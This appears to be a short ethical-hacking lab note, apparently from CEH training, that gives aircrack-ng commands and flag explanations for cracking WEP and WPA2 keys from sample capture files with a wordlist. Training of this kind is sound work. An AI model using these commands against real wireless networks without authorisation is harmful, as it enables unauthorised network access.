# Crack a WEP network using Aircrack-ng
----------------------------------------
1. aircrack-ng '/home/attacker/Desktop/Sample Captures/WEPcrack-01.cap'  (By issuing the above command aircrack-ng will crack the WEP key of the CEHLabs)

# Crack a WPA2 Network using Aircrack-ng
-----------------------------------------
1. aircrack-ng -a2 -b [Target BSSID] -w /home/attacker/Desktop/Wordlist/password.txt '/home/attacker/Desktop/Sample Captures/WPA2crack-01.cap' 
-a is the technique used to crack the handshake, 2=WPA technique.
-b refers to bssid; replace with the BSSID of the target router. (20:E5:2A:E4:38:00)
-w stands for wordlist; provide the path to a wordlist.
